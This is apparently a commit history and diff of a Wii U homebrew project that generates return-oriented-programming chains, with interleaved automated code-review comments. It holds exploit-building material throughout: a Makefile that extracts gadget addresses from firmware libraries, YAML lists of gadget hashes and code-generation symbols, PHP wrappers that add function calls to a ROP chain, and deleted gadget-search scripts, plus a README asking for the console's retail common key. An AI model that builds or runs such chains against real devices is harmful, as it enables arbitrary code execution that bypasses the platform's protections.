orboditilt
8d5b8ab0b6 Remove unused scripts 2019-02-25 19:02:41 +01:00
orboditilt
0a24047530 - Reduce number of dependencies.
-Fix GX2 addresses for 5.3.2
2019-02-25 18:59:47 +01:00
orboditilt
b6909c596b Add GX2Init symbol 2019-02-25 17:47:42 +01:00
orboditilt
254d89a32c Add some wrappers for calling functions 2019-01-23 21:13:12 +01:00
orboditilt
4b56cb4cd0 - Improve makefile to compile/build/download only when needed.
- Add support for getting gadgets from gx2.rpl
- Add some new rop address to be searched
2019-01-23 21:10:08 +01:00
7 changed files with 143 additions and 70 deletions


@ -22,38 +22,54 @@ export READELF := $(PREFIX)readelf
export OBJCOPY := $(PREFIX)objcopy
DEFINES :=
COREINIT_PATH := tmp/$(FIRMWARE)/000500101000400A/code/coreinit.rpl
COREINIT_PATH_ELF := $(COREINIT_PATH).elf
ifeq ($(OS),Windows_NT)
exe_ext := .exe
else
exe_ext :=
endif
COREINIT_CONFIG_PATH := coreinit.yml
GX2_CONFIG_PATH := gx2.yml
COREINIT_PATH := tmp/$(FIRMWARE)/coreinit.rpl
GX2_PATH := tmp/$(FIRMWARE)/gx2.rpl
TARGET_FILENAME := wiiuhaxx_rop_sysver_$(FIRMWARE).php
GADGET_FINDER_PATH := bin/rpxgadgetfinder.jar
all: loader locateall
loader:
loader: wiiuhaxx_loader.bin wiiuhaxx_searcher.bin
wiiuhaxx_loader.bin: wiiuhaxx_loader.s
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_loader.elf wiiuhaxx_loader.s
$(OBJCOPY) -O binary wiiuhaxx_loader.elf wiiuhaxx_loader.bin
wiiuhaxx_searcher.bin: wiiuhaxx_searcher.s
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_searcher.elf wiiuhaxx_searcher.s
$(OBJCOPY) -O binary wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin
locateall: locate532 locate550
locate532:
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 11464 -out tmp/532
make locatespecific FIRMWARE=532 TEXTADDRESS=0x0101c400
make locatespecific FIRMWARE=532 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
locate550:
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 15702 -out tmp/550
make locatespecific FIRMWARE=550 TEXTADDRESS=0x0101c400
locatespecific:
./bin/rpl2elf$(exe_ext) $(COREINIT_PATH) $(COREINIT_PATH_ELF) > /dev/null
sh ./wiiuhaxx_locaterop.sh $(COREINIT_PATH) $(TEXTADDRESS) $(exe_ext) > wiiuhaxx_rop_sysver_$(FIRMWARE).php
make locatespecific FIRMWARE=550 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
checkrpl: $(COREINIT_PATH) $(GX2_PATH)
$(COREINIT_PATH):
if [ -a $(COREINIT_PATH) ]; then $(error missing $(COREINIT_PATH) for FW $(FIRMWARE)); fi;
$(GX2_PATH):
if [ -a $(GX2_PATH) ]; then $(error missing $(GX2_PATH) for FW $(FIRMWARE)); fi;
$(CONFIG_FILENAME):
if [ -a $(CONFIG_FILENAME) ]; then $(error missing $(CONFIG_FILENAME)); fi;
$(GADGET_FINDER_PATH):
if [ -a $(GADGET_FINDER_PATH) ]; then $(error missing $(GADGET_FINDER_PATH)); fi;
locatespecific: checkrpl $(GADGET_FINDER_PATH) $(CONFIG_FILENAME)
@echo "Finding symbols for FW $(FIRMWARE)"
@echo "<?php" > $(TARGET_FILENAME)
@java -jar $(GADGET_FINDER_PATH) -cin $(COREINIT_CONFIG_PATH) -bin $(COREINIT_PATH) -aoff -$(ADDRESS_OFFSET_COREINIT) >> $(TARGET_FILENAME)
@java -jar $(GADGET_FINDER_PATH) -cin $(GX2_CONFIG_PATH) -bin $(GX2_PATH) -aoff -$(ADDRESS_OFFSET_GX2) >> $(TARGET_FILENAME)
@echo "?>" >> $(TARGET_FILENAME)
clean:
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin wiiuhaxx_rop_sysver_* tmp
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin wiiuhaxx_rop_sysver_*
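Review bot: The `$(COREINIT_PATH):` … `$(GADGET_FINDER_PATH):` guard rules do not do what their shell `if` suggests: `$(error …)` is a Make function expanded when the recipe line is read, so it aborts before any shell runs, and `[ -a path ]` is true when the file exists, so the test is inverted as well — the rules only appear to work because Make runs them solely when the target is missing. `$(CONFIG_FILENAME)` (prerequisite of `locatespecific` and target of the fourth guard) is never assigned in this file — the defined names are `COREINIT_CONFIG_PATH` and `GX2_CONFIG_PATH` — so it expands to nothing and the yml inputs are never checked at all. I'd replace the four rules with one explicit missing-input rule over the real variables, invoke the sub-make as `$(MAKE)` so `-n`/`-j` propagate, and add `.DELETE_ON_ERROR:` so a failing `java -jar` does not leave a partially appended `$(TARGET_FILENAME)` that the next run treats as current.
```make
.DELETE_ON_ERROR:
.PHONY: all loader locateall locate532 locate550 locatespecific checkrpl clean

# … unchanged: tool variables, paths, loader rules …

locate532:
	$(MAKE) locatespecific FIRMWARE=532 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
locate550:
	$(MAKE) locatespecific FIRMWARE=550 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))

checkrpl: $(COREINIT_PATH) $(GX2_PATH)

# Inputs are supplied by the user (see README); a missing one fails here with a
# clear message instead of Make's generic "No rule to make target".
$(COREINIT_PATH) $(GX2_PATH) $(GADGET_FINDER_PATH) $(COREINIT_CONFIG_PATH) $(GX2_CONFIG_PATH):
	@echo "missing $@ (needed for FW $(FIRMWARE))" >&2; exit 1

locatespecific: checkrpl $(GADGET_FINDER_PATH) $(COREINIT_CONFIG_PATH) $(GX2_CONFIG_PATH)
# … unchanged: gadget-finder recipe writing $(TARGET_FILENAME) …
```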


@ -1,15 +1,16 @@
# README
This fork is supposed a common base for Wii U ROP-chains.
This fork is supposed to be a common base for Wii U ROP-chains.
## Building
Before using the ROP-chain, some files need to be compiled/generated, you can do it with `make`.
The makefile expects some binaries/files.
- `bin/ropgadget_patternfinder(.exe)` [Download](https://github.com/wiiu-env/ropgadget_patternfinder/releases)
- `bin/rpl2elf(.exe)` [Download](https://github.com/wiiu-env/rpl2elf/releases)
- `bin/FileDownloader.jar` [Download](https://github.com/wiiu-env/NUSFileDownloader/releases)
- `common.key` containing the retail Wii U common key (in binary form, 16 bytes).
- `bin/rpxgadgetfinder.jar` [Download](https://github.com/wiiu-env/RPXGadgetFinder/releases) (requires Java 11(!))
- `tmp/532/coreinit.rpl` from 00050010-1000400A OSv10 v11464
- `tmp/532/gx2.rpl` from 00050010-1000400A OSv10 v11464
- `tmp/550/coreinit.rpl` from 00050010-1000400A OSv10 v15702
- `tmp/550/gx2.rpl` from 00050010-1000400A OSv10 v15702
When you have all needed files, you can use `make`.

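--- /dev/null
+++ b/coreinit.yml
@@ -0,0 +1,74 @@
+!!de.orb.wiiu.rpxgadgetfinder.SymbolList
+symbols:
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: memcpy, out: $ROP_memcpy}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: DCFlushRange, out: $ROP_DCFlushRange}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: ICInvalidateRange, out: $ROP_ICInvalidateRange}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSwitchSecCodeGenMode, out: $ROP_OSSwitchSecCodeGenMode}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSCodegenCopy, out: $ROP_OSCodegenCopy}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCodegenVirtAddrRange, out: $ROP_OSGetCodegenVirtAddrRange}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCoreId, out: $ROP_OSGetCoreId}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCurrentThread, out: $ROP_OSGetCurrentThread}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSetThreadAffinity, out: $ROP_OSSetThreadAffinity}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSYieldThread, out: $ROP_OSYieldThread}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSFatal, out: $ROP_OSFatal}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: _Exit, out: $ROP_Exit}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenFlipBuffersEx, out: $ROP_OSScreenFlipBuffersEx}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenClearBufferEx, out: $ROP_OSScreenClearBufferEx}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_Acquire, out: $ROP_OSDynLoad_Acquire}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_FindExport, out: $ROP_OSDynLoad_FindExport}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: __os_snprintf, out: $ROP_os_snprintf}
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+yHAg7FCY0T7dPuDQ0BMToKXwp5N/NsD19OlQMWWuM/s=
+out: $ROP_POPJUMPLR_STACK12
+size: 16
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+3s/zyode/BqcPQrHYY8++j0zylm9P9YCp0fTRpvVwAA=
+out: $ROP_POPJUMPLR_STACK20
+size: 16
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+UwYkiCHAcqnPXHHJRpFx4XzSlm9m/H1hLOec/41dEko=
+out: $ROP_CALLFUNC
+size: 52
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+9OdgU6ZcVx8rO4xsbd6XPJX4ibzPCiLrlknLx4EMjpg=
+out: $ROP_CALLR28_POP_R28_TO_R31
+size: 44
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+R0G4Y63PdC+JKMSFo588yGKUadHdzPnmjJ3RwlNB8JE=
+out: $ROP_POP_R28R29R30R31
+size: 32
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+lylzvoB06SsPEPxfu6rvbCjikF+ZAHZUzXNaX9aZM/w=
+out: $ROP_POP_R27
+size: 20
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+b18R/cRB3e+PIYnLyQBlF8SRf89ul1y4y+sjc7+OjKI=
+out: $ROP_POP_R24_TO_R31
+size: 20
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+5gL2bPiq3E1efbB0rZuPv6QZD4YqghXPJvcHpJypUHA=
+out: $ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM
+size: 40
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+Xh+0gQ/2+4a7Uz8gUDBt5uA+CUUIh99ssixthRHD4mc=
+out: $ROP_SETR3TOR31_POP_R31
+size: 24
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+XO0YJxjoIEwpnqH44pWEGgMl7kk4k7hgU952LMDu+0g=
+out: $ROP_Register
+size: 12
+- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
+hash: !!binary |-
+xFfDPPQrAMLgC5bixrCXhIZDvBcui9yfDn2XToM4YLY=
+out: $ROP_CopyToSaveArea
+size: 12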
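Review bot: Every `GadgetSymbol` entry identifies its gadget only by a SHA-256 over `size` bytes, so when a hash stops matching on a newer coreinit nothing in the file says what instruction sequence to search for, and for `$ROP_Register` and `$ROP_CopyToSaveArea` even the `out` name does not describe the gadget's shape the way `$ROP_POP_R27` or `$ROP_CALLFUNC` do. A `#` comment above each entry recording the matched disassembly (or at least the containing function and how the digest was produced) would make the entries reproducible; as a minimum I'd add `# TODO: record the disassembly this hash matches so it can be re-found on a new firmware` above the two un-descriptive ones. The deleted `wiiuhaxx_locaterop_script` carried the same digests in hex with no description either, so this is the moment to capture it.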

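--- /dev/null
+++ b/gx2.yml
@@ -0,0 +1,5 @@
+!!de.orb.wiiu.rpxgadgetfinder.SymbolList
+symbols:
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Init, out: $ROP_GX2Init}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Flush, out: $ROP_GX2Flush}
+- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2DirectCallDisplayList, out: $ROP_GX2DirectCallDisplayList}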


@ -8,7 +8,7 @@ if($ropchainselect == -1)
$ropchainselect = 1;
}
if(!isset($wiiuhaxxcfg_payloadfilepath) || (($ropchainselect != 4) && !isset($wiiuhaxxcfg_loaderfilepath)))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
if(!isset($wiiuhaxxcfg_payloadfilepath) || (($ropchainselect < 4) && !isset($wiiuhaxxcfg_loaderfilepath)))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
if(!isset($sysver))$sysver = -1;
@ -510,6 +510,26 @@ function generateropchain_type3(){
ropgen_OSFatal($payload_srcaddr);
}
function ropgen_GX2DirectCallDisplayList($addr,$size){
global $ROP_GX2DirectCallDisplayList;
ropgen_callfunc($ROP_GX2DirectCallDisplayList, $addr, $size, 0x0, 0x0, 0x0);
}
function ropgen_GX2Flush(){
global $ROP_GX2Flush;
ropgen_callfunc($ROP_GX2Flush, 0x0, 0x0, 0x0, 0x0, 0x0);
}
function ropgen_Register($namePtr,$nameSize,$arg3,$arg4){
global $ROP_Register;
ropgen_callfunc($ROP_Register, $namePtr, $nameSize, $arg3, $arg4, 0x0);
}
function ropgen_CopyToSaveArea($namePtr,$nameSize,$srcAddr,$srcLen){
global $ROP_CopyToSaveArea;
ropgen_callfunc($ROP_CopyToSaveArea, $namePtr, $nameSize, $srcAddr, $srcLen, 0x0);
}
function generateropchain_type4()
{
global $ROP_OSFatal, $ROP_Exit, $ROPHEAP, $ROPCHAIN, $payload_tmp_address, $wiiuhaxxcfg_searchpayloadfilepath, $payload_start_search,$valid_payload_dst_address, $payload_search_for;
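Review bot: Each new wrapper (`ropgen_GX2DirectCallDisplayList`, `ropgen_GX2Flush`, `ropgen_Register`, `ropgen_CopyToSaveArea`) hands its `$ROP_*` global straight to `ropgen_callfunc`, so a symbol the gadget finder did not emit for the selected sysver arrives as null and is presumably written into the chain as address 0 with no diagnostic; guard each one before use, e.g. in `ropgen_GX2Flush` add `if(!isset($ROP_GX2Flush))die("ROP_GX2Flush is not defined for this sysver.");` after the `global` line, and likewise in the other three. `ropgen_Register` and `ropgen_CopyToSaveArea` also take `$arg3`/`$arg4` whose meaning is not visible here, so a one-line docblock on each stating what the caller must pass in those slots would help the next reader. `generateropchain_type4` is opened at the end of the hunk and its body continues outside it.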


@ -1,34 +0,0 @@
ospath=$1
coreinit_textaddr=$2
extension=$3
reloc=$((0x02000000-$coreinit_textaddr))
getcoreinit_symboladdr()
{
val=`powerpc-eabi-readelf -a "$PWD/$ospath.elf" | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2`
printf "$2 = 0x%X;\n" $((0x$val-$reloc))
}
echo "<?php"
./bin/ropgadget_patternfinder$extension $ospath.elf --baseaddr=$coreinit_textaddr "--plainsuffix=;" --script=wiiuhaxx_locaterop_script #?1EFE3500?
echo ""
getcoreinit_symboladdr "memcpy" "\$ROP_memcpy"
getcoreinit_symboladdr "DCFlushRange" "\$ROP_DCFlushRange"
getcoreinit_symboladdr "ICInvalidateRange" "\$ROP_ICInvalidateRange"
getcoreinit_symboladdr "OSSwitchSecCodeGenMode" "\$ROP_OSSwitchSecCodeGenMode"
getcoreinit_symboladdr "OSCodegenCopy" "\$ROP_OSCodegenCopy"
getcoreinit_symboladdr "OSGetCodegenVirtAddrRange" "\$ROP_OSGetCodegenVirtAddrRange"
getcoreinit_symboladdr "OSGetCoreId" "\$ROP_OSGetCoreId"
getcoreinit_symboladdr "OSGetCurrentThread" "\$ROP_OSGetCurrentThread"
getcoreinit_symboladdr "OSSetThreadAffinity" "\$ROP_OSSetThreadAffinity"
getcoreinit_symboladdr "OSYieldThread" "\$ROP_OSYieldThread"
getcoreinit_symboladdr "OSFatal" "\$ROP_OSFatal"
getcoreinit_symboladdr "_Exit" "\$ROP_Exit"
getcoreinit_symboladdr "OSScreenFlipBuffersEx" "\$ROP_OSScreenFlipBuffersEx"
getcoreinit_symboladdr "OSScreenClearBufferEx" "\$ROP_OSScreenClearBufferEx"
getcoreinit_symboladdr "OSDynLoad_Acquire" "\$ROP_OSDynLoad_Acquire"
getcoreinit_symboladdr "OSDynLoad_FindExport" "\$ROP_OSDynLoad_FindExport"
getcoreinit_symboladdr "__os_snprintf" "\$ROP_os_snprintf"
echo "?>"


@ -1,9 +0,0 @@
--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = "
--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = "
--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = "
--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = "
--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = "
--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = "
--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = "
--patterntype=sha256 --patterndata=e602f66cf8aadc4d5e7db074ad9b8fbfa4190f862a8215cf26f707a49ca95070 --patternsha256size=0x28 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = "
--patterntype=sha256 --patterndata=5e1fb4810ff6fb86bb533f2050306de6e03e09450887df6cb22c6d8511c3e267 --patternsha256size=0x18 --addval=0xFFFFFCFC "--plainout=$ROP_SETR3TOR31_POP_R31 = "